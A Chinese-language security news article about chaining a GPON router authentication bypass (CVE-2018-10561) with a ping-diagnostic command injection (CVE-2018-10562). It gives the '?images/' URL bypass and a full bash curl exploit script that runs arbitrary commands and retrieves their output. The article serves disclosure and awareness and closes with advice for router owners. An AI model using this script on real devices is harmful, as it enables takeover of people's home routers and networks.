信息來(lái)源:4hou
研究人員發(fā)現(xiàn)了一種繞過(guò)認(rèn)證的方式來(lái)訪問(wèn)GPON家庭路由器(CVE-2018-10561),也就是繞過(guò)了我們俗稱(chēng)的“光貓”。專(zhuān)家們將這種身份驗(yàn)證繞過(guò)漏洞與另一個(gè)命令注入漏洞(CVE-2018-10562)關(guān)聯(lián)在一起,就能夠在設(shè)備上執(zhí)行命令。
利用
專(zhuān)家們分析了GPON家用路由器的固件,發(fā)現(xiàn)兩個(gè)不同的嚴(yán)重漏洞(CVE-2018-10561和CVE-2018-10562)可以關(guān)聯(lián)在一起,以便完全控制易受攻擊的設(shè)備,從而控制網(wǎng)絡(luò)。第一個(gè)漏洞利用設(shè)備的身份驗(yàn)證機(jī)制,攻擊者可以利用該漏洞繞過(guò)所有身份驗(yàn)證。
該漏洞會(huì)影響HTTP服務(wù)器的構(gòu)建,HTTP服務(wù)器會(huì)在進(jìn)行身份驗(yàn)證時(shí)檢查特定的路徑。這允許攻擊者使用簡(jiǎn)單的技巧繞過(guò)任何端點(diǎn)上的身份驗(yàn)證。
通過(guò)追加
?images/到URL
攻擊者可以繞過(guò)端點(diǎn)。
這適用于HTML頁(yè)面和GponForm/
例如,通過(guò)插入
/menu.html?images/或/GponForm/diag_FORM?images/
專(zhuān)家們能夠控制GPON 家用路由器。
在查看設(shè)備功能時(shí),專(zhuān)家們注意到診斷端點(diǎn)包含ping和traceroute命令。使用主機(jī)參數(shù)就可以注入命令。
“由于路由器將ping結(jié)果保存在/ tmp并在用戶(hù)重訪/diag.html時(shí)將其發(fā)送給用戶(hù),因此執(zhí)行命令并通過(guò)身份驗(yàn)證繞過(guò)漏洞獲取其輸出非常簡(jiǎn)單?!盫PNMentor(analysis)發(fā)布的分析結(jié)果。
專(zhuān)家發(fā)布以下bash版本的漏洞利用代碼:
#!/bin/bash
echo "[+] Sending the Command... "
curl -k -d "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=\`$2\`;$2&ipv=0" $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null
echo "[+] Waiting...."
sleep 3
echo "[+] Retrieving the ouput...."
curl -k $1/diag.html?images/ 2>/dev/null | grep 'diag_result = ' | sed -e 's/\\n/\n/g'
“用兩種模式反向(`)和分號(hào)(;)發(fā)送命令,因?yàn)椴煌哪P驮诓煌脑O(shè)備上觸發(fā)”。
GPON是一種非常流行的使用光纖的無(wú)源光網(wǎng)絡(luò)設(shè)備,這些設(shè)備由ISP(網(wǎng)絡(luò)運(yùn)營(yíng)商)提供。據(jù)不完全統(tǒng)計(jì),有超過(guò)100萬(wàn)人在使用這種類(lèi)型的網(wǎng)絡(luò)路由器。
專(zhuān)家們總結(jié)表示,
我們?cè)诤芏嚯S機(jī)的GPON路由器上測(cè)試了這個(gè)漏洞,并發(fā)現(xiàn)在這些設(shè)備上均存在此漏洞。因?yàn)楹芏嗳耸褂眠@些類(lèi)型的路由器,所以這個(gè)漏洞很有可能會(huì)導(dǎo)致整個(gè)網(wǎng)絡(luò)的淪陷。
建議
1.檢查您的路由器是否使用GPON網(wǎng)絡(luò)。
2.請(qǐng)注意,GPON路由器可能會(huì)被黑客利用。
3.與ISP溝通,了解他們可以采取哪些措施來(lái)修復(fù)該漏洞。